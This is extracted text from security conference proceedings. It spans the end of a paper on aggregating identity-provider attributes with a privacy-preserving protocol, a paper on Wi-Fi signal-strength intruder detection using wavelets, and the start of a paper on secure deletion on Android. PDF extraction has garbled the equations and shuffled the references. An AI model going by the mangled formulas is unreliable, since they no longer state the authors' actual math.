works mentioned above there is one aspect that must be taken
into account: in the solutions presented the use of ontologies
was only applied to a small number of databases.
(UAs) in order to improve user identification strength. Through
an iterative process with the user, he/she will specify which
of the IdP(s) that can be used to authenticate him/her in SP
does he/she want to use.
A search performed in all pointed IdPs can find matches that
are able to certify, with a greater level of assurance, that a user
is, in fact, who he/she claims to be. The greater the number
of matches found, the greater the strength of the identifier,
both because the number of attributes comprising the identifier
becomes bigger, but also because some attributes with low
assurance levels are repeated by several IdPs. An overview of
our mechanism can be observed in Fig. 1.
The solutions proposed have not yet been tested in a heavy
environment. Thus the proposals present no data showing how
they perform in a production environment with multiple IdPs
and a large number of users.
IV. P ROPOSED S OLUTION
A. Application Context
Our application context is the Stork Project, which is one
of five eGovernment Large Scale Projects (LSP). The LSPs
eCodex, epSOS, PEPPOL and SPOCS carry information regarding justice, health care, procurement and generic business
processes, respectively, from one Member State (MS) service
to the other. These services communicate with each other
through a network of gateways. Stork aims to provide a
fundamental building block of any application or service:
Authentication. From this perspective, the Stork Project may
share four different building blocks with the other LSPs: Authentication, Authorization, Electronic Signatures (long term
authentication), and Document Credentials (long term authorization).
B. Solution
As mentioned earlier, previous solutions make no attempt
to build strong identifiers by merging identities. Or even try
to increase the assurance level of the identification process by
joining attributes from several IdPs.
The Stork Project aims to be a basic building block for
eGovernment services, providing services such as: Authentication, Authorization, etc. Our proposed mechanism will act in
the Citizen ”Pan European Proxy Service” (C-PEPS), the Stork
gateway. C-PEPS takes on the task verifying citizen credentials
and obtaining additional data, e.g., from the represented person
and mandates. This role also entails three business processes:
Authentication on behalf of, Powers (digital signature), and
Business Attributes. Each PEPS includes functionalities specific to its Member State, which are typically the interfaces
with the local ID providers, national and business attribute
providers.
We propose a mechanism, named User Identification
Strengthen (UsIdS), which performs an open search through
users IdPs finding correspondences in the users’ attributes
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Fig. 1. Proposed search mechanism to find correspondences in user
identification attributes
The mechanism assumes, as start point, that user provides
a list of IdPs where UAs can be found. As can be observed
in Fig. 1, the user sends a service request (Fig. 1 - step 1),
indicating the UsIdS as IdP. The SP redirects those instructions
to UsIdS (Fig. 1 - step 2). Then, the user sends authentication
attributes/authenticates in UsIdS (Fig. 1 - step 3), and attribute
set requests are sent to all of the user’s IdPs (Fig. 1 - steps
4a, and 4b), the IdPs will then send responses to the UsIdS
(Fig. 1 - steps 5a, and 5b) with user attributes sets, each set
containing at least the attribute name, Assurance Level (AL),
and value. The purpose is to find direct attribute matches,
intersections, in attribute sets that can confirm and strengthen
the user’s identity. The answers received can be handled in
two ways depending on the result of the UsIdS analysis of the
IdP response.
If an attribute name match is found, the next step is to verify
if the attribute values correspond. Otherwise, when attribute
names do not match, the next step is to verify on the reference
ontology if there is any Ontological Relation (OR) which may
established between IdPs involved. If that is the case, attribute
values are verified for correspondence. When attribute names
do not match, and no ontological relations can be established,
UsIdS tries to establish a trusted IdPs network.
To find IdPs, the UsIdS proceeds to search stored ontological relations looking for previously used IdPs. Then a request
for user information is sent to that IdPs, and attribute sets are
returned in response. UsIdS looks for attribute relations (ARs)
between each of the two first IdPs (e.g., IdP1 and IdPn ) and
the new one (e.g., IdPx ). Once an AR is found between i.e.,
IdP1 and IdPx (e.g., IdP1 .AttrX = IdPx .AttrX ), the existence
98
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
of AR between IdPn and IdPx is then is verified. This is
repeated until an AR be can found among three, or more, IdPs.
When this occurs, the IdPx attribute set search for presence
of any attribute that may be used to improve the strength of
the aggregated identity.
When a match is found, the AL of each attribute is verified
and the UsIdS sends, as the AL of aggregation, the lowest
value within the aggregated value pairs.
In a more schematic way, the process can be seen as follows:
1) Structural Level Verification
a) With naming conflicts: verifies whether or not
similar values, from different user attributes sets,
have the same attribute identification.
i) Reference ontology-based strategy: ontological
relations must be established/verified to solve
naming conflicts and help find attribute value
correspondences.
b) Without naming conflicts: when there are correspondences in attributes identification names.
2) Verification Matches
a) Direct matches: a search is performed in the attribute sets that looks for matches in attribute
values. i.e.: Set1 .Attr1 .Value=Set2 .Attr1 .Value?
b) Ontological Relation matches: once a UsIdS
finds ontological relations (step 1(a)i) it performs
a search through those association sets looking for correspondences in attribute values. i.e.:
Set1 .OR1 .Value=Set2 .OR2 .Value?
c) Through trusted IdPs network establishment: it is
necessary to obtain user’ IdPs in order to create
such a network. Then, the process restarts from
step 1.
Once UsIdS has performed its searches if correspondences
were found an indicator of trust on the User Identity is
provided to SP (Fig. 1 - step 6).
As previously described, these matches can be through direct attribute matching or obtained from ontological resources.
These ontological resources use an ontology-reference based
strategy due to the reduced mapping requirements.
As a start point, the ontologies are used to solve SchemaLevel conflicts. According to [14], this kind of conflicts
involve differences at the structural level of domain models
that need to be mapped. The conflicts can be divided into
following categories: naming conflicts, entity identifier conflicts, schema-isomorphism conflicts, generalization conflicts,
and aggregation conflicts. We will keep our focus on naming
conflicts. This type of conflicts arise when similar concepts
are labelled in a different way, or when different concepts are
labelled in a similar way.
All established ontological relations are stored in C-PEPS,
to improve matching performance in the following searches
involving the same users and IdPs, although no private data is
kept.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
When no matches can be found, the UsIdS tries to establish
a trusted IdP network path. The purpose of this network
is to find data associations with a third or fourth IdP that
can be used to establish a relation among the others IdPs.
However, finding the necessary IdPs may be a problem.
One possible solution is to search in established ontological
relations previously stored. It is also possible to ask the user
to indicate where the UsIdS may find more attributes that can
lead to matches.
C. Privacy
In order to keep users’ privacy, we define a protocol
considering the model where partners are ”honest but curious”,
or ”semi-honest” [15]. This protocol will be used in communications between IdPs and UsIdS to prevent disclosing of
user information in the process of trying to find matches; the
entities involved should not gain more information than the
one authorized by the user. For instance, if for creating a link
between two sets of attributes it is necessary to use another
attribute that both IdPs know, this linking attribute should only
be revealed, to each attribute source, if the attributes match
(i.e., the link is possible), otherwise the attribute source would
become aware of user private information for which it was not
authorized.
The protocol is defined as follows:
Let p and q be two large prime numbers such that q divides
p − 1, Gq be the unique subgroup of Z∗p or order q, and g and
h be generators of Gq .
Let x, y, and c be random numbers in Zq .
Let id be the identifier/attribute that both IdPs know but
don’t want to share.
The identifiers id1 and id2 are private within the attributes.
The protocol must prove that these two identifiers were generated from the same id but it should not be possible to know
the exact id value.
Assuming that both the IdP1 and the IdPn follow the
protocol:
Fig. 2. Proposed privacy preserving protocol
UsIdS sends a challenge c, and generators g and h to both
IdP1 and IdPn . They reply with a Security Assertion Markup
Language (SAML) [16] assertion containing an identifier
inside, id1 = g id hx and idn = g id hy , respectively, but these
99
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
identifiers are not equal id1 6= idn . They also include in
response r1 = hcx and rn = hcy . Finally, the UsIdS must
id1 c
) = rr12 .
verify that the following equation holds: ( id
n
Following this privacy protocol, it is possible to verify if
the attribute values correspond without disclosing them.
V. R EMAINING P ROBLEMS AND F UTURE R ESEARCH
There is still, room for further research on how to apply
ontologies in UsIdS i.e., an evaluation of how accurate are
ontology mappings. A formal definition of collusion resistance
must be specified (UsIdS x IdPs, and SPs x IdPs). Some
accuracy validations need to be performed on aggregations
in order to verify how efficient the UsIdS is. Once there
are prototypes it will be possible evaluate and validate the
proposed ideas.
VI. C ONCLUSIONS
We have proposed a solution to increase the strength of
user identifiers by combining facets (i.e., sets of attributes)
from several IdPs. The strength of the identifiers results both
from an increase in the assurance level of attributes repeated
in both sets and an increase of the number of attributes that
comprise the combined facet.
Ontologies solve the problem of “Naming Conflicts” that
occur when combining sets of attributes. Our chosen Reference
Ontology fits our application context (STORK Project), in
which there are several languages being used and user data
definition on IdPs also has different designations.
Our decision to store ontological relations is due to the
fact that the process of establishing these relations could be
computationally heavy. So storing the results can improve
future searches and can be used to discover IdPs to use in
IdPs networks.
The communication process between UsIdS and IdPs uses
a privacy protocol in order to assure that user attribute values
are not disclosed when IdPs network establishment is being
perform. Furthermore, no user attribute values are stored in
UsIdS, it just acts as an User Identity Aggregator by relaying
IdPs attributes and establishing relations among IdPs and
Users.
ACKNOWLEDGMENT
[3] M. Ates, J. Fayolle, C. Gravier, and J. Lardon, “Complex federation
architectures: Stakes, tricks & issues,” in Proceedings of the 5th International Conference on Soft Computing As Transdisciplinary Science
and Technology, ser. CSTST ’08. New York, NY, USA: ACM, 2008, pp.
152–157, ISBN: 978-1-60558-046-3, URL: http://doi.acm.org/10.1145/
1456223.1456258 [accessed: 2014-09-02].
[4] E. Bertino, F. Paci, and N. Shang, “Keynote 2: Digital identity protection
- concepts and issues,” in Availability, Reliability and Security, 2009.
ARES ’09. International Conference on, March 2009, pp. lxix–lxxviii,
ISBN: 978-1-4244-3572-2, URL: http://dx.doi.org/10.1109/ARES.2009.
176 [accessed: 2014-09-02].
[5] “Identity assurance framework: Assurance levels,” 2010.
[6] D. Chadwick and G. Inman, “Attribute aggregation in federated identity management,” Computer, vol. 42, no. 5, pp. 33–40, May 2009,
ISSN: 0018-9162, URL: http://dx.doi.org/10.1109/MC.2009.143 [accessed: 2014-09-02].
[7] D. W. Chadwick, G. Inman, and N. Klingenstein, “A conceptual model
for attribute aggregation,” Future Gener. Comput. Syst., vol. 26, no. 7,
pp. 1043–1052, Jul. 2010, ISSN: 0167-739X, URL: http://dx.doi.org/10.
1016/j.future.2009.12.004 [accessed: 2014-09-02].
[8] J. Vossaert, J. Lapon, B. Decker, and V. Naessens, “User-centric identity
management using trusted modules,” in Public Key Infrastructures,
Services and Applications, ser. Lecture Notes in Computer Science,
J. Camenisch and C. Lambrinoudakis, Eds. Springer Berlin Heidelberg,
2011, vol. 6711, pp. 155–170, ISBN: 978-3-642-22632-8, URL: http:
//dx.doi.org/10.1007/978-3-642-22633-5 11 [accessed: 2014-09-02].
[9] M. Barisch, E. Garcia, M. Lischka, R. Marques, R. Marx, A. Matos,
A. Mendez, and D. Scheuermann, “Security and privacy enablers for
future identity management systems,” in Future Network and Mobile
Summit, 2010, June 2010, pp. 1–10, ISBN: 978-1-905824-18-2.
[10] F. Paci, R. Ferrini, A. Musci, K. Steuer, and E. Bertino, “An interoperable
approach to multifactor identity verification,” Computer, vol. 42, no. 5,
pp. 50–57, May 2009, ISSN: 0018-9162, URL: http://dx.doi.org/10.
1109/MC.2009.142 [accessed: 2014-09-02].
[11] N. Shang, F. Paci, and E. Bertino, “Efficient and privacy-preserving
enforcement of attribute-based access control,” in Proceedings of the
9th Symposium on Identity and Trust on the Internet, ser. IDTRUST ’10.
New York, NY, USA: ACM, 2010, pp. 63–68, ISBN: 978-1-60558-8957, URL: http://doi.acm.org/10.1145/1750389.1750398 [accessed: 201409-02].
[12] V. Kashyap and A. P. Sheth, Information Brokering Across Heterogeneous Digital Data: A Metadata-based Approach (Advances in Database
Systems). Springer, 2000, ISBN: 0792378830.
[13] T. R. Gruber, “A translation approach to portable ontology specifications,” Knowl. Acquis., vol. 5, no. 2, pp. 199–220, Jun. 1993, ISSN:
1042-8143, URL: http://dx.doi.org/10.1006/knac.1993.1008 [accessed:
2014-09-02].
[14] A. Mocan, F. M. Facca, N. Loutas, V. Peristeras, S. K. Goudos,
and K. A. Tarabanis, “Solving semantic interoperability conflicts in
cross-border e-government services,” International Journal on Semantic Web & Information Systems, vol. 5, no. 1, pp. 1–47, 2009,
DOI: 10.4018/jswis.2009010101, URL: http://dx.doi.org/10.4018/jswis.
2009010101 [accessed: 2014-09-02].
[15] Y. Lindell and B. Pinkas, “Secure multiparty computation for privacypreserving data mining,” Journal of Privacy and Confidentiality, vol. 1,
no. 1, pp. 59–98, 2009, URL: http://repository.cmu.edu/cgi/viewcontent.
cgi?article=1004&context=jpc [accessed: 2014-09-02].
[16] “Saml specifications,” 2013, URL: http://saml.xml.org/samlspecifications/ [accessed: 2014-09-08].
This work was partially supported by CAPES Proc. Num.
BEX 9096/13-2 and EU project Stork 2.0 CIP-ICT-PSP-20115-297263.
R EFERENCES
[1] S. Carmody, M. Erdos, K. Hazelton, W. Hoehn, B. Morgan, T. Scavo,
and D. Wasley, “Incommon technical requirements and information,”
2005.
[2] T. W. House. (2009, February) National strategy for trusted identities in cyberspace: Enhancing online choice, efficiency, security, and
privacy. URL: http://www.whitehouse.gov/sites/default/files/rss viewer/
NSTICstrategy 041511.pdf [accessed: 2014-09-02].
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
100
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Wi-Fi Intruder Detection
An experimental approach
Rui Fernandes1, João N. Matos1, Tiago Varum1
1
Instituto de Telecomunicações Aveiro
Aveiro, Portugal
ruifelix@ua.pt, matos@ua.pt, tiago.varum@ua.pt
Abstract - In a society where monitoring and security are
one of the most important concerns, this system represents a
convenient and interesting low-cost solution in terms of
intruder detection. Using widely spread infrastructure such as
Wi-Fi routers and laptops, we proposed an innovative
alternative, capable of detecting intruders by sensing the
different electromagnetic interference caused. These
perturbations are sensed by the system through the changes in
the acquired Wi-Fi Received Signal Strength Indicator (RSSI),
in the presence of obstacles/targets between the transmitter
and receiver.
Keywords-Wi-Fi; RF Signature; Wavelet Transform;
Intruder Detection; RSSI, Security; Wireless.
I.
INTRODUCTION
A wide number of solutions for intrude detection are
available nowadays. From the simple and low cost infrared
and Passive Infrared (PIR) sensors [1][2] that detect the heat
radiated from the human body, up to the high-end RADAR
security [3] systems, a large variety of effective solutions
are available to fulfil the various needs of different
scenarios.
Among all the mentioned solutions are the requirement
to introduce or install extra components in the medium
under surveillance. The goal of this work is to propose an
innovative and pertinent alternative suitable for modern
scenarios.
With a sense of practicality in mind, our system reutilizes
the widely spread Wi-Fi infrastructures, taking leverage of
easy implementation, turning suitable for both domestic and
industrial environments. Utilizing only a standard Wi-Fi
router, connected wirelessly to a laptop with dedicated
software, this security system can be a simple solution for
the actual intruder detection problem. This work mostly
tries to show the concept of Wi-Fi intruder detection with
results in a controlled scenario. Despite that, some
considerations and challenges to adapt this prototype to a
real scenario are addressed.
This paper is divided in six sections. The first two
sections are dedicated to provide an overview of the
develop work and the state of the art applications. The third
section, unveils the system operation modules and provides
a brief explanation of the concepts of Wavelet Transform
and the RSSI in the scope of the designed prototype. The
fourth and fifth sections address the experimental set up and
the results obtained, with an additional presentation of
considerations regarding the set up used and its consequent
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Pedro Pinho1,2
2
Inst. Sup. Eng. Lisboa – ISEL
Lisboa, Portugal
ppinho@deetc.isel.pt
analysis. Finally, the last section draws some conclusions
and indicates the future work proposed by the group.
II.
RELATED WORK
In the last decades, with the proliferation of mobile
phones and Wi-Fi Access Points (AP), a set of ground
breaking applications were developed to demonstrate the
large capacity of wireless networks.
An example of this trend is presented by the concept of
Wi-Fi localization [3][4][5]. This concept exploits RSSI
data from different AP’s to reassemble innovative and
accurate localization systems, providing an attractive
solutions and complement to the Global Positioning System
(GPS). So parallel to the development of these applications,
studies were conducted focusing on the Received Signal
Strength Indicator (RSSI) characteristics and practical
concerns [3][4].
Recently, in the monitoring scope, WiSee [6] and WiVi
[7] displayed the large tracking detail that can be obtained
from Wi-Fi signals when proper signal processing tools are
applied.
The WiSee showed the capacity of Wi-Fi based systems
to recognize human gestures by extracting the signals
frequency Doppler shifts [6]. The WiVi using a Multi Input
Multi Output (MIMO) interference nulling [7], detects
human movement through walls by the elimination of the
static objects reflections.
More in the context of this work, a detection system
based on the RSSI was presented with the goal of
monitoring pedestrian and automobile traffic [6]. The
differentiation of the targets was obtained through the
different RSSI changes triggered by the cars and the
humans. To achieve this objective a moving mean and
variance technique was adopted to analyze the data.
We proposed a less complex system inspired in the
previously mentioned works that through the RSSI, senses
the alterations of intruders on a static environment. To
refine the detection and to possibly avoid false alarms, the
Wavelet Transform is applied to the RSSI data. This signal
processing technique is characterized to have a time and
frequency multiresolution being utilized in diverse image
and video processing procedures [9][10][11][12][13].
III.
SYSTEM
This section is dedicated to the system characterization.
As mentioned before, the RSSI and the Wavelet Transform
are the core of the operation principle, so due to their
101
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
importance an introduction of these concepts is presented in
the following subsections.
A. RSSI
The RSSI is a Radio Frequency (RF) measure, which
indicates in dBm, a reference value of the received signal
power in the receiver antenna.
Nevertheless, the RSSI is a precise indicator of the
received signal strength and quality of the connection in real
time, it was proven that the RSSI used on its own needs to
pass through a calibration process to overcome the
environment factors that influence the signal quality
[4][14][15].
The RSSI was addressed in this paper as a measure that
indicates the effects on the received signal of the presence
of intruders or other targets.
B. Wavelet Transform
The Wavelet Transform is a multiresolution signal
processing method capable of adjusting the window length
to get a desirable precision in different signal regions,
allowing long time windows where low frequency
information is needed and short windows for high
frequency.
According to Misiti et al. [10], “A wavelet is a
waveform of effectively limited duration that has an
average value of zero.”. However in contrast with the
sinusoids, basis of the Fourier analysis, the wavelets tend to
have irregularities and “unpredictable” shape.
The Wavelet Transform uses shifted and scaled versions
of the main wavelet to separate the signal under analysis.
So, the choice of an adequate wavelet is an important step
in the analyzing process.
The Wavelet Transform is represented in mathematical
terms by:
+∞
� �, � = ∫ � � � �, �, � ��
−∞
1
where a represents the scale factor and p the shifted
position. The Continuous Wavelet Transform (CWT) is a
sum over time of the multiplication of the signal with a
scaled and shifted version of the main wavelet. Each
coefficient evaluates the comparison between the original
signal and the wavelet, where the higher the value of the
coefficient the more similarities exist between the signal
and the wavelet.
In the proposed system, the interference generated by
intruders is analyzed applying the Wavelet Transform over
the RSSI stream of data. The core of the analysis process
comes from the correct choice of a wavelet and scale
function, giving great importance and detail to find the best
match between wavelet and the pattern to be detected.
The wavelet chosen was the Haar wavelet (step
function) with a scale factor of 30. This decision was made
taking in consideration the similarities of the step function
with the human interference and the better results obtained
after several wavelets tested, the ones presented in Figure 1.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Fig. 1. Example of Wavelet families. (a)Haar, (b) Daubechie4, (c)
Coiflet1, (d)Symlet2, (e) Meyer, (f) Moelet, (g) Mexican Hat [8]
C. System Architecture
The system architecture is divided in three
interconnected modules: radio, data and processing module.
a) Radio module
The radio module is responsible for emitting and
receiving the data using the Wi-Fi protocol. It is constituted
by a router in the transmitter side and a laptop with a
receiver antenna connected to a network card in the receiver
side.
The designed prototype utilizes a Samsung laptop
model NP350V5C, an Asus LAN Wireless Router model
WL-500n and an external network card from the
manufacturer TPLINK, model TL-WN722N ( see Figure
4).
This hardware module is responsible for both generating
and receiving electromagnetic signals in the 2.4 GHz
operation band.
Our system is influenced by the inherent characteristics
of wireless communication protocols, being the most
relevant the multipath path fading, packets collision and the
natural interference from other AP’s.
b) Data Module
The data module is both software and hardware based
and has the role to be the communication bridge between
the radio and processing module. Connected with the PHY
layer through the network card, the data module selects the
packets applying network filters, discarding packets from
undesirable network address. When this filtering process is
completed, the stream of RSSI data is sent to the processing
module (Figure 2).
The software used was the Microsoft Network Monitor
3.4, responsible for gathering all the RSSI values and
selecting the correct network address.
102
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
being the targets inserted in half distance, i.e., 1.5 meters
(Figure 4).
Processing module
Wireless Signal
W
RSSI data stream
Detection module and
Analysis
Fig. 2. Simplification of the Data Module operation principle
EXPERIMENTAL SET UP
The experiments were elaborated in a domestic indoor
scenario. The line of sight between the transmitter and
receiver was intentionally clear in a radius of approximately
3 meters. The directional antennas used, were set at a height
of 1 meter with 1.8 meters distance to the ceiling (Figure 4).
The receiver and transmitter were separated by 3 meters
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
1.5 meters
1 met er
1.5 meters
1.8 met ers
The half distance was adopted after the testing of several
set up’s with the targets more close to the Tx or to the Rx.
These asymmetrical arrangements proved that the results
are dominated by the smaller distance between the target
and the Tx or Rx. Also, when the targets are inserted close
to the transmitter or receiver end of the system the signals
are highly attenuated. The minimum acceptable distance
between the target and the Tx or Rx obtained for our system
was of 20 cm. In distances below that threshold, the
received signal is very low and with large power
fluctuations.
The system was also evaluated for more Tx and Rx
distances between the 0.2 to 10 meters interval. With this
study it was concluded that the distance does not affect
much the performance until the 6 meters distance mark, in
this controlled environment experiments, generating only a
decreased of the mean value of the received signals in order
of 1 to 6 dB. After this distance, the presence of the human
is more difficult to identify.
1 met er
IV.
Fig. 3. Simplification of the Data Module operation principle
1.8 met ers
c) Processing Module
The processing module is completely software based
and is implemented in a MATLAB platform (Figure 3).
This module has the important task of filtering the noise
from the received signals and applying signal processing
methods to detect and distinguish the different targets.
The filtering process is simply used to eliminate noise
due to multi path and collision components inherent in WiFi connections. This noise appears in the received signals,
in the form of notches of one sample duration, with 20 to 30
dB of attenuation, in comparison with the trend of the
signal. To filter these undesirable samples, was adopted a
simple scheme that detects and discards packets, having
always in mind the concern of maintaining the original
signal response. Then, the Wavelet coefficients are
computed and the human presence is analyzed. The
application of the Wavelet Transform also guaranties an
additional filtering process, because turns the system
insensitive to the variance of quality of the received signal
in a wireless channel, having the coefficients values
oscillating around zero. This last feature can be very
interesting for example to create/design an automatic target
identification method. This would be based on the
thresholds of the coefficient values generated from different
targets, which is very difficult to be implemented directly
from the RSSI data.
Connecting all the modules, the system works in the
following manner: the radio module generates the signals in
the emitter side; the signals propagate in the medium,
affected by the intruder presence. When received, the
signals are handled in the receiver side of the radio module.
Then, the data module gathers from the PHY layer the RSSI
data and selects the correct network address, sending
posteriorly the data to the processing module. Here, the data
is filtered and then the Wavelet Transform is applied. With
Wavelet coefficients computed, the data is analyzed with
the goal to see if an intruded is detected.
Fig. 4. Schematic of the experimental set up.
Is also worth to mention that the system works with the
presence of obstacles in the nearby, with only the special
attention to the line of sight Tx and Rx. With the
experiments elaborated by the group, it can be preliminary
concluded that the presence of objects with similar size to
the human body blocking the line of sight influence the
system performance, especially metallic objects.
103
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
a) Detection Experiments
The system detection performance was tested in two
different scenarios: presence of one and two humans.
To avoid false alarms, the response of the system with
the presence of domestic animals, in particular cats and
dogs, was evaluated. The dimensions of the different targets
are presented in Table 1.
TABLE I.TARGET DIMENSIONS
Human 1
1.70
0.45
Height (m)
Width (m)
Human 2
1.68
0.40
Dog
0.68
0.45
Cat
0.3
0.57
Regarding the testing procedure, the experiments
consisted on taking samples of the environment in a silent
scenario, for approximately 20 seconds, inserting then the
targets during the same interval. In the animal detection, the
accuracy of the sampling intervals dropped due to the
unpredictable animal reaction.
The angle of detection in the 3 meters experiments was
approximately ± 30° in the longitudinal plane.
V.
RESULTS AND ANALYSIS
The results are presented in two subsections. The first
one evaluates the human detection and the second one the
domestic animal response. In both sections, the first graphic
shows the RSSI data and the second one the Wavelet
Coefficients plot.
Fig. 6. Two humans walking side by side, Up) RSSI data; Down)
Wavelet Coefficients
B. Animal detection
The results from animal detection are presented in
Figure 7 and 8. The interference of a dog presented to be
smaller in comparison with the human’s. Both signal
attenuation and Wavelet coefficient alterations are reduced
but perceptible in both patterns.
A. Human detection
The human detection results are presented in Figures 5
and 6. In both plots, the moments of intruder presence are
easily distinguished. Specifically, is visible the attenuation
of approximately 10 dB of the received signal in the RSSI
data and the increase values of Wavelet coefficients with a
consequently oscillation of the pattern.
Fig. 7. Dog, Up) RSSI data; Down) Wavelet coefficient
Fig. 5. Human walking; Up) RSSI data; Down) Wavelet coefficients
The experiment with the presence of two humans side
by side shown a similar interference in comparison to the
single human experiment, presenting only a wider
attenuation interval (Figure 6).
Fig. 8. Cat, Up) RSSI data; Down) Wavelet coefficient
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
104
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
The cat detection results are shown in Figure 8. Due to
the smaller dimensions of the cat, principally in height, the
signal attenuation is only around 1 to 3 dB which presents
to be out of the system detection range.
VI.
CONCLUSION AND FUTURE WORK
This work presented an innovative security system able
of detecting intruders based on the RF interference
generated in a static environment. The proposed Wavelet
Transform based technique exhibited a good detection
capability and enhanced the target identification
performance of the system.
The Wavelet Transform coefficient analysis shows to be
a good complement to the RSSI data, with suitable
characteristic to improve the system to autonomously
identify the targets (recalling the processing module
subsection) and possibly avoiding false alarms like
neglecting a car or a dog detection.
The Wavelet Transform improvements are also
noticeable in the detection of moving targets with
significant speed, e.g., running human, where the
interference
triggered
can
be
mistaken
with
noise/oscillations in the RSSI raw data. In contrast, the
patterns obtained with the Wavelet coefficients are similar
to those presented in this paper, where the detections
moments are easily seen. Additionally, to enhance the
system detection capacity, the adjustment of the scale factor
of the Wavelet Transform can be used to detect/neglect
smaller RSSI signal interference/patterns. These two last
topics are not addressed in detail in this paper because are
currently under study, with only preliminary results.
To support the system, an evaluation experiment
exposed the different effects on the received signals of the
domestic animals presence. The domestic animals proved to
have a reduced influence in the system performance, except
when the emitter and receivers are very close to the animal
(less than 0.75 meters).
The results proved the feasibility and performance of
this interesting low-cost solution, achieving in a total of 500
experiments, a 95% human detection in a domestic scenario
ratio comparable to other RSSI based systems [5][8]. In
[5][8], the authors claim to achieve 100% human detection
ratio in similar conditions, i.e., line of sight.
Under study are methods to distinguish different targets
more efficiently, the adaptation of the system to perform a
real-time detection, the introduction of additional antennas
to improve the system coverage area and the use of dual
frequency mode available in the 802.11 standard. In terms
of propagation, the influence of linear and circular polarized
antennas in the system performance are also under analysis.
In the experimental set up it is also under study the
influence of the presence of obstacles, the intruder detection
outside the line of sight and to conclude, test our system in
a real environment to further prove our concept and to
isolate the improvements needed.
[2] Y.W. Bai, Z.H. Li, and Z.L. Xie, "Enhancement of the complement
of an embedded surveillance system with PIR sensors and ultrasonic
sensors," Consumer Electronics (ISCE), 2010 IEEE 14th
International Symposium on, June, 2010, pp. 1-6.
[3] P. Bahl and V. N. Padmanabhan, "RADAR: An In-Buidling RFbased User Location and Tracking System," IEEE INFOCOM,
March, 2000, vol.2, pp.775- 784.
[4] M. Saxena, P. Gupta, and B. N. Jain, "Experimental Analysis of
RSSI-based Location Estimation in Wireless Sensor Networks,"
Communication Systems Software and Middleware and
Workshops, January, 2008, pp. 503-510.
[5] Z. Zhang, X. Zhou, W. Zhang, Y. Zhang, and G. Wang, "I Am the
Antenna: Accurate Outdoor AP Location using Smartphones,"
MobiCom '11, August, 2011, pp. 109-120.
[6] F. Adib and D. Katabi, "See through walls with WiFi!," ACM
SIGCOMM Computer Communication, August, 2013,Volume 43
Issue 4, pp.75-86.
[7] Q. Pu, S. G. S. Gollakota and S. Patel, "Whole-home gesture using
wireless signals," MobiCom '13, October, 2013, pp. 27-38.
[8] A. Al-Husseiny and M. Youssef, "RF-based Traffic Detection and
Identification," Vehicular Technology Conference (VTC Fall),
IEEE, September, 2013, pp. 1-5.
[9] A. N. Akansua, W. A. Serdijn, and I. W. Selesnick, "Emerging
applications of wavelets: A review," Physical Communication 3,
Elsivier, March, 2010, pp.1-8.
[10] M. Misiti, Y. Misiti, G. Oppenheim, and J.-M. Poggi, Wavelet
Toolbox™ 4,User’s Guide, The MathWorks, Inc., 2009.
[11] S. Arivazhagan and R. N. Shebiah, "Object Recognition Using
Wavelet Based Salient Points," The Open Signal Processing Journal
2, December, 2009, pp. 14-20.
[12] Y. Jin, E. Angelini, and A. Laine, "Wavelets in Medical Image
Processing: Denoising, Segmentation, and Registration ",
International Topics in Biomedical Engineering,Springer US,
January, 2005, pp. 305-358.
[13] J. N. Bradley, C. M. Brislawn, and T. Hopper, "FBI wavelet/scalar
quantization standard for gray-scale fingerprint image
compression," Visual Information Processing II, June, 1993, p. 293.
[14] X. Li, J. Teng, D. X. Qiang Zhai, Junda Zhuy, and Y. F. Zhengy,
"EV-Human: Human Localization via Visual Estimation of Body
Electronic Interference" Proceedings of INFOCOM 2013, April,
2013, pp. 500-504.
[15] A. LaMarca, J. Hightower, I. Smith, and S. Consolvo, "SelfMapping in 802.11 Location Systems," Intel Research Seattle,
Seattle, 2005, pp. 87-104.
REFERENCES
[1] T. Yokoishi, J. Mitsugi, O. Nakamura, and J. Murai, "Room
occupancy determination with particle filtering of networked
pyroelectric infrared (PIR) sensor data," Sensors, 2012 IEEE,
October, 2012, pp. 1-6.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
105
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Adding Secure Deletion to an Encrypted File System on Android Smartphones
Alexandre Melo Braga, Alfredo H. Gallinucci Colito
Centro de Pesquisa e Desenvolvimento em Telecomunicações (Fundação CPqD)
Campinas, São Paulo, Brazil
{ambraga,acolito}@cpqd.com.br
Abstract—Nowadays, mobile devices are powerful enough to
accomplish most of the tasks previously accomplished only by
personal computers; that includes file management. However,
on many devices the file deletion operation misleads the user
into thinking that the file has been permanently removed,
when that is usually not the case. Also, with the increasing use
of encryption, attackers have been directed to weaker targets.
One of them is the recovery of supposedly deleted data from
flash memories. This paper describes a way to integrate secure
deletion technologies in an encrypted file system in Android
smartphones.
Keywords-secure delete; secure storage; encrypted file
system; flash memory; mobile devices; Android.
I.
INTRODUCTION
Nowadays, many users keep their sensitive data on
mobile devices. However, mobile devices are vulnerable to
data leakage. As the amount of digital data grows, so does
the theft of sensitive data through loss of device, exploitation
of vulnerabilities or misplaced security controls. Sensitive
data may also be leaked accidentally due to improper
disposal or resale of devices.
With the increasing use of encryption systems, an
attacker wishing to gain access to sensitive data is directed to
weaker targets. One possible attack is the recovery of
supposedly erased data from internal storage, possibly a flash
memory card. To protect the secrecy of data during its entire
lifetime, encrypted file systems must provide not only ways
to securely store, but also reliably delete data, in such a way
that recovering them from physical medium is almost
impossible.
The new generations of mobile devices are powerful
enough to accomplish most of the tasks previously
accomplished only by personal computers. That includes file
management operations (e.g., create, read, update, and
delete). Also, today’s devices possess operating systems that
are hardware-agnostic by design and abstract from ordinary
